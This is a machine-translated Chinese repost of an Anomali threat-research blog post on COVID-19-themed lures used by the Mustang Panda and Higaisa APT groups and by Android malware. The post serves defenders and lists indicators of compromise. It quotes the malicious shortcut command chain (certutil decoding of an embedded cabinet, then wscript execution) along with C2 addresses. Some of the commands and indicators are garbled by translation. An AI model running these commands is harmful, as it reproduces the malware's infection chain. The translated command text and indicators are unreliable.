LNK无文件攻击形态——压缩文件中有lnk文件
https://www.anomali.com/blog/covid-19-themes-are-being-utilized-by-threat-actors-of-varying-sophistication
概述
威胁行为者正在利用 COVID-19(冠状病毒)的全球传播进行恶意活动。随着世界以各种方式应对这一威胁,行动者正试图利用混乱来为自己谋取利益。威胁参与者利用不同的战术、技术和程序 (TTP) 进行恶意活动,将 COVID-19 用作恐吓战术的武器。虽然 Anomali Threat Research (ATR) 的大多数观察结果都是商品(可购买和广泛分发)活动和恶意软件。ATR 发现 Higaisa 和 Mustang Panda 高级持续威胁 (APT) 组织一直在他们的活动中使用以冠状病毒为主题的诱饵。
除了以机器为目标的活动外,ATR 还确定了针对 Android 移动设备的 COVID-19 主题。其中一个样本正在使用功能齐全的冠状病毒感染跟踪应用程序,而 SpyNote 远程访问木马 (RAT) 在后台运行。另一个是网络钓鱼活动,它使用虚假的 Adobe Flash 更新和与 COVID-19 相关的 URL 来安装 Cerberus 银行木马。虽然其中一些恶意软件是商品并且可能是更明显的恶意尝试,但攻击者可能会继续滥用这些主题来安装各种恶意软件系列,其中一些将在下面讨论。
细节
当前在开源上报告的活动包括使用 COVID-19 作为网络钓鱼活动的一部分的威胁参与者,包括电子邮件主题和内容以及附件。[1]在世界卫生组织于 2019 年 12 月 31 日报告了 41 例 COVID-19 病例后,此类以病毒为主题的活动几乎立即开始。[2]到 2020 年 1 月和 2020 年 2 月,以冠状病毒为主题的诱饵已经广泛传播在 Emotet 僵尸网络的帮助下。[3]这些活动中使用的恶意软件可能会有所不同,因为许多参与者都可以购买和使用许多分发方法,但是,也有一些高级持续威胁 (APT) 参与者试图利用 COVID-19 爆发的实例。
2020 年 3 月中旬,Check Point Research 发布了他们的调查结果,该调查结果涉及针对蒙古公共部门利用以冠状病毒为主题的诱饵文件的活动。[4]此 RTF 活动也与 ATR 确定的 RTF 活动一致。[5] APT 经常使用相关主题作为诱饵,ATR 还发现了此类试图利用冠状病毒相关事件的团体。
APT活动
ATR 观察到从 2 月下旬到 2020 年 3 月中旬的一场活动,我们认为该活动由总部位于中国的 APT 集团 Mustang Panda 进行。该组织正在利用与 COVID-19 相关的诱饵文件来攻击台湾和越南。Mustang Panda 继续使用 Cobalt Strike 和 PlugX RAT 作为其最终有效载荷。此活动与 ATR 先前确定的 Mustang Panda TTP 一致。[6]
诱饵文件
文档标题- 02-21-1.docx
哈希- 6d994c64c17ce50cbb333c8b4bcbd8e0
图 1 - 陈建仁 Facebook 讨论
上述文件描述的是中华民国现任副总统、台湾中央研究院前副院长陈建仁在脸书上发表的一篇文章。该帖子讨论了[冠状病毒]的社区过渡以及美国(美国)疾病控制中心(CDC)为其列出的国家,特别是台湾。台湾外交部随后要求从上述名单中删除。
文件标题- 03-01-1.docx
哈希- 7f0a1bdde14ea1f3085b43bdadcfb146
图 2 - COVID-19 问题
图 2 包含翻译成英文的文本,可能是从中文翻译过来的,因为 Mustang Panda 位于中国,因为拼写和语法错误对于母语人士来说并不常见。该文本提出了有关以不同程度的复杂程度中和 COVID-19 的问题。
文件标题- Chi Thi cua thu tuong nguyen xuan phuc.doc
哈希- 13d61974d2db537bdb0504cfc53b74a7
图 3 - 2020 年 3 月 3 日越南政府会议文章
图 3 中的文件是一篇讨论越南总理阮春福于 2020 年 3 月 3 日举行的会议的文章。与会的其他政府官员谈到了这段时间的团结以及大约 3,000 人如何被隔离和都在军队的照顾下。其他主题包括整体冠状病毒预防措施和旅行限制更新。该文章可在 www.cantho.gov[.]vn 上公开获得,并且很可能是 Mustang Panda 从该来源获取的,正如 ATR 在该组织之前的活动中所观察到的那样。
技术分析
上面提到的三个 RAR(压缩文件)文件每个都包含一个 Windows 快捷方式 (.lnk) 文件。Mustang Panda 使用的 .lnk 文件通常包含一个带有 VBscript 的嵌入式 HTA 文件,一旦执行,将丢弃并打开诱饵文档(关联分析,压缩包里含有脚本文件!!!),而有效负载的恶意活动在后台运行。ATR 观察到 PlugX 和 Cobalt Strike 在整个活动中作为主要有效载荷提供。
.lnk 文件
表 1 - .lnk 文件元数据
| 文件MD5 | 链接修改日期 | 文件大小 | 名称字符串 | 命令行参数 | NetBios 名称 | MAC地址 |
|---|---|---|---|---|---|---|
| FC00964131A8C9407BA77484E724FC9D | 2009 年 7 月 14 日 1:14 | 301568 | 02-21-1.lnk | /cf%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) 做 f%windir:~-3,1%%PUBLIC:~-9, 1% /f delims==" %i in ('dir "%x -21-1.lnk" /s /b') 开始 %TEMP:~-2 | 赢 67od36i8f4c | 00:0C:29:50:2D:E6 |
| 0F794D6C6646A260558E9D638AE060C9 | 2009 年 7 月 14 日 1:14 | 301568 | 03-01-1.lnk | /cf%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) 做 f%windir:~-3,1%%PUBLIC:~-9, 1% /f delims==" %i in ('dir "%x -01-1.lnk" /s /b') 开始 %TEMP:~-2 | cia-at28--planc | 00:0C:29:50:2D:E6 |
| A4B7FE08900074B6A103D2CF36730421 | 2010 年 11 月 21 日 3:24 | 302592 | Chi Thi cua thu tuong nguyen xuan phuc.lnk | /cf%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) 做 f%windir:~-3,1%%PUBLIC:~-9, 1% /f delims==" %i in ('dir "%xChi Thi cua thu tuong nguyen xuan phuc.lnk" /s /b') 开始 %TEMP:~-2 | win-gnhs1vcentrt | AA:50:18:7E:EB:82 |
有效载荷分析
Mustang Panda 使用名为 Cobalt Strike 的著名对手仿真工具作为以下样本02-21-1.lnk和03-01-1.lnk的最终有效载荷。该组织利用 Cobalt Strike 工具中的可塑性命令和控制 (C2) 功能来掩盖对 code.jquery.com 的合法 DNS 请求背后的恶意流量。上面提到的样本使用 123.51.185[.]75 作为它们的最终 C2。
与 ATR 确定的 Mustang Panda 之前的活动相比,两个显着变化是:
- 更改有效负载所在的目录C:UsersPublicMusic
- 用于 DLL 侧加载的合法可执行文件tencentsoso.exe的使用
示例Chi Thi cua thu tuong nguyen xuan phuc.lnk使用PlugX作为其最终负载。执行后,它会在目录C:ProgramDataMicrosoft Malware Protectionydy中删除三个文件。unescapp.exe是一个合法的可执行文件,由“ESET, spol. s ro”,它被滥用于 DLL 劫持技术来执行 http_dll.dll,它解码并加载恶意负载 http_dll.dat。执行有效负载后,它会到达 C2 域 vietnam[.]zing[.]photos 并解析为 104.160.44[.]85。
图 4 - 丢弃的文件位置
ATR 根据 TTP、目标国家和恶意软件家族的使用情况,将此次活动归咎于 Mustang Panda,而这些恶意软件家族之前都被归咎于该组织。[7]
比嘉活动
Covid.pdf.lnk - 21a51a834372ab11fba72fb865d6830e
2020 年 3 月 15 日,ATR 发现了一个恶意 .lnk 文件,该文件利用了类似于其他已知 APT 组的感染链。发现该活动使用了与韩国 APT 组织 Higaisia 重叠的 C2 基础设施。由 .lnk 文件删除的诱饵文件是从世界卫生组织网站下载的,很可能被用于针对讲英语的个人和实体。
.lnk 使用多阶段流程来交付精美的 PDF 文档(图 5)和最终有效负载 PlugX,它到达 C2 动机[.]neighboring[.]站点并解析为 69.172.75[.]223。PlugX 是一种远程访问木马 (RAT),通常由中国的威胁行为者使用。
图 5 - 世界卫生组织情况报告
技术分析
.lnk 文件包含嵌入的 base64 编码内容 blob。检查 .lnk 元数据,似乎攻击者已修改它们,例如以下字段已被篡改,创建时间、机器 ID 和 MAC 地址,如图 6 所示。
图 6 - .lnk 元数据
执行 .lnk 文件后,在后台运行以下命令,
/c 复制“20200308-sitrep-48-covid-19.pdf.lnk”%tmp%\g4ZokyumBB2gDn.tmp /y&
对于 /r C:\Windows\System32\ %i in (*ertu*.exe) 复制 %i %tmp%\msoia.exe /y&
findstr.exe "TVNDRgAAAA" %tmp%\g4ZokyumBB2gDn.tmp>%tmp%\cSi1r0uywDNvDu.tmp&%tmp%\
msoia.exe -解码 %tmp%\cSi1r0uywDNvDu.tmp %tmp%\oGhPGUDC03tURV.tmp&
展开 %tmp%\oGhPGUDC03tURV.tmp -F:* %tmp% &
wscript %tmp%\9sOXN6Ltf0afe7.js
文件 cSi1r0uywDNvDu.tmp 是一个Windows 文件柜(.cab) 文件。该cabinet文件的内容如下图7所示。
图 7 - 内阁文件的内容
使用内置 Windows 可执行文件extract.exe提取压缩文件的内容,并将它们重命名,如图 8 所示。
图 8 - 重命名的文件柜文件内容
JavaScript 9sOXN6Ltf0afe7.js执行复制和重命名文件等多种操作,它使用离地技术使用cscript.exe执行 VBscript 文件WsmPty.xsl。[8] VBscript 负责创建持久性,并通过滥用合法的可执行文件msostyle.exe来执行进一步的有效负载。在执行时,它会加载文件oinfo12.ocx (.dll) 并进一步加载并执行wordcnvpxy.exe (PlugX)。恶意软件会访问 C2 URL 动机[.]neighboring[.]site/01/index.php。
如上所述,下面的图 9 和图 10 描述了重叠的证据。C2 IP 69.172.75[.]223 之前由 Higaisa 使用,并于 2020 年 2 月下旬报告。[9]
图 9 - Higaisa C2 重叠
图 10 - Higaisa 与 IP 的通信示例 (https://community.riskiq.com/search/69.172.75.223)
移动恶意软件
APK 标题- Avist.apk
哈希- 107169ae6951a5cba57d2a0cd274e28fadf5c73d73e91a386f15cf4dc35edd38
此 Android 应用程序功能齐全,将像普通应用程序一样更新整体 COVID-19 统计数据。当用户安装 COVID-19 跟踪应用程序时,SpyNote RAT 会在后台下载。
图 11 - 安装请求
图 12 - 功能性 COVID-19 应用程序外观
APK 标题- UpdateFlashPlayer_11_5_1.apk
哈希- F57a44bec2f7af2da443f068edb0a743f9625ac3a9d686393bacb8e72274b5de
Android 银行木马 Cerberus 一直在利用围绕冠状病毒爆发的关注作为推动其恶意软件的机会。使用包括coronaviruscovid-19-information[.]com和covid19-info[.]online(等等)在内的各种网站诱骗用户下载Cerberus木马。导航到这些网站之一会提示访问者下载伪装成 Adobe Flash Player 更新的 Cerberus。安装后,Cerberus 的主要目标是窃取财务信息,然而,木马可以根据参与者的目标进行操纵。
图 13 - Adobe Flash Player 更新 (Cerberus) 的冠状病毒相关 URL 提示
国际奥委会
域/IP/URL
104.160.44[.]85
123.51.185[.]75
69.172.75[.]223
越南[.]zing[.]照片
动机[.]neighboring[.]site
http://vietnam.zing.photos:443 /update?wd=df07d8ba
动机[.]neighboring[.]site/01/index.php
哈希
| 文件名 | MD5 哈希 |
|---|---|
| Http_dll.dat | 0DE06292C0010A4E8F453806373E68D4 |
| http_dll.dll | 415591D11CF6AEB940AC92C904A1F26A |
| 02-21-1.rar | A0D41E87BF259CE882C4977D79FA806A |
| 03-01-1.rar | 24AF885E38D7CA7912824F2470E5E6BE |
| Chi Thi cua thu tuong nguyen xuan phuc.rar | 60C89B54029442C5E131F01FF08F84C9 |
| 02-21-1.lnk | FC00964131A8C9407BA77484E724FC9D |
| 03-01-1.lnk | 0F794D6C6646A260558E9D638AE060C9 |
| Chi Thi cua thu tuong nguyen xuan phuc.lnk | A4B7FE08900074B6A103D2CF36730421 |
| 3UDBUTNY7YstRc.tmp | 83D04F21515C7E6316F9CD0BB393A118 |
| 486AULMsOPmf6W.tmp | 371E896D818784934BD1456296B99CBE |
| 9sOXN6Ltf0afe7.js | 4F8FF5E70647DBC5D91326346C393729 |
| cSi1r0uywDNvDu.tmp | EEFEB76D26338E09958AAE5D81479178 |
| MiZl5xsDRylf0W.tmp | C1D8966FA1BD7AEE41B2C4AD731407D3 |
| oGhPGUDC03tURV.tmp | 37f78b1ad43959a788162f560bdc9c79 |
| Covid.pdf.lnk | 21a51a834372ab11fba72fb865d6830e |
| Covid.zip | a89607c9515caeb1d784439a1ee1f208 |
| Wordcnvpxy.exe | fd648c3b7495abbe86b850587e2e5431 |
| 20200308-sitrep-48-covid-19.pdf | FAF5EF01F4A9BF2ABA7EDE67DCC5A2D4 |
| covid-19.jar | 13c26ea1dc3a2fee403a7913f6f66c03 |
| covid-预防措施.exe | 45a0797b74db206615e92050ecf7b31e |
| Basic_protection.pdf | c9184430cfd1e72ff9213e67f73b06c2 |
| 文件2.exe | ec517204fbcf7a980d137b116afa946d |
| CoronaVirus_Video-11032020BRTORS2VYLLOC8NTR7DA79YIM6.vbs | 0a648ccc4c7ce4f4315adc22878c49c2 |
| Ferribiella Italy-CORONAVIRUS 11.03.2020_EN.exe 官方通讯 | 405f2f6fa2077552fa848bb740bd5ffd |
| 电晕治疗.doc | 4efc395c3cd44646e2bfb9680932b811 |
| 日志日.dll | 4efc395c3cd44646e2bfb9680932b811 |
| 冠状病毒_疾病_COVID-19__773315073441331.doc | 8ff6621ecf76a5632dc7ca459f3e5a89 |
| 词典.docx | 3519b57181da2548b566d3c49f2bae18 |
| 武汉旅行信息采集申请表.xlsm | b08dc707dcbc1604cfd73b97dc91a44c |
| POEA HEALTH ADVISORY re-2020 Novel Corona Virus.pdf.exe | f59c558d9b33a25ac8b32f495f6fd035 |
| COVID-19_Tracker.exe | 595149b8dcab35fde269a86d0bd74756 |
| Avist.apk | 660159f431b5f8ec8c4fed0298168d1a |
| https://covid19-info[.]online/UpdateFlashPlayer_11_5_1.apk | 3382348f9618058dde3aacffcb34982e |
| 面向公众的电晕病毒建议____________________pdf.exe | 8a228725fe66ab52a62eb44687ad0680 |
| 圣约翰神医疗保健 (COVID-19) Notice.pdf | 19fda4048f29fbf6e0c9e0a4b8bd0946 |
| 下载 PDF 文件 - 冠状病毒病 2019 控制 scr | e7fab8e420dd74157bc4dcc5ab396dc8 |
其他以冠状病毒为主题的哈希
a70a55e62c963d58817e5087fe9fe7e3
3a2438dd2c13c48ce7867a9ebefc9e5a
9ca4f31fb9707adc43d9b7e630b2cf26
fb525e13cb82ea91b9d7576e3078674c
dc0d41af833054bc8fd6fa3894fed188
a61ab959038859f3a185ab688271894c
e53ce7efb47a1ea67fa8df6621f2294b
98051bcea1ec152a80c6acaa4e46a069
f908dc8852f659dd43a8dc25f3d74c2e
62a5677e30343bc14078b97148d67036
71b3db4cf0a03c8650c140e023a06793
bb512de5decd3a2428407660ff57678c
2e1ea39e25dde32a9a36078ac59db814
1e85dd017cd9f9d856e5943e8824009e
3bc7a303e48a39b0582cb6aa888b6f49
e5ce3207e8e7019bd0f0963956267128
af5ce343c7e4c64319c658c87b85f9a6
002e017b97eda9eaae523a0a9a518d84
26b95d45df0744d11cf1d91f5629ba87
2d79034d853b32423b1e06c3f27bfc61
0fb5cc4ac25234239d291e40b47c98d3
fc20439e60e168f7bc5b1afd0a31e015
b0ef3735aaf9ea9de69848d7131c6942
a0045f26111de6b079dc0bffd5aef4e6
4b30f50d1a8f8c12bca8fd436c1469fd
b3f496ce13ff6fed1048399e1fc89403
7b4a3d320a888059a6328a61f21d9095
8bd336d4dcdc4f45a9a5c72d5791f6a8
55879cddb0e18c34aaa992d24690e0e7
320cde0e1b34e03f0ea393a0483b6798
结论
威胁行为者是机会主义者,他们会不断更新他们恶意活动的主题,无论他们认为哪种方式会增加完成目标的机会。商品恶意软件将更改为与当前时间段相关的任何主题。正如本报告中所讨论的,威胁行为者仍在使用安全社区已知和讨论的 TTP,只是社会工程文档的内容发生了变化。
冠状病毒效应是全球性的,并且越来越多地影响现实生活和网络中的个人。我们希望每个人都尽最大努力在这段时间内保持安全。有关冠状病毒的更多信息,请访问以下网站:
- https://www.cdc.gov/coronavirus/2019-ncov/index.html
- https://www.gov.uk/guidance/coronavirus-covid-19-information-for-the-public
尾注
[1] CISA,“防御 COVID-19 网络诈骗”,US-CERT,2020 年 3 月 17 日访问,2020 年 3 月 6 日发布,https: //www.us-cert.gov/ncas/current-activity/2020 /03/06/defending-against-covid-19-cyber-scams;Insikt Group,“利用冠状病毒恐慌,威胁行动者瞄准全球受害者”,记录的未来,2020 年 3 月 17 日访问,2020 年 3 月 12 日发布, https://go.recordedfuture.com/hubfs/reports/cta-2020-0312 -2.pdf。
[2] “关于冠状病毒病 (COVID-19) 的滚动更新”,世界卫生组织,2020 年 3 月 17 日访问,2020 年 3 月 18 日发布,https: //www.who.int/emergencies/diseases/novel-coronavirus- 2019/事件发生时。
[3] Nick Biasini 和 Edmund Brumghin,“威胁行为者试图利用冠状病毒爆发”,思科 Talos 博客,2020 年 3 月 17 日访问,2020 年 2 月 13 日发布,https://blog.talosintelligence.com/2020/02/冠状病毒主题恶意软件.html;“2020 年 1 月最受欢迎的恶意软件:以冠状病毒为主题的垃圾邮件传播恶意 Emotet 恶意软件”,Check Point 博客,2020 年 3 月 17 日访问,2020 年 2 月 13 日发布,https: //blog.checkpoint.com/2020/02/13/january -2020s-most-wanted-malware-coronavirus-themed-spam-spams-malicious-emotet-malware/。
[4] “2020 年 1 月最受欢迎的恶意软件:以冠状病毒为主题的垃圾邮件传播恶意 Emotet 恶意软件”,Check Point 博客。
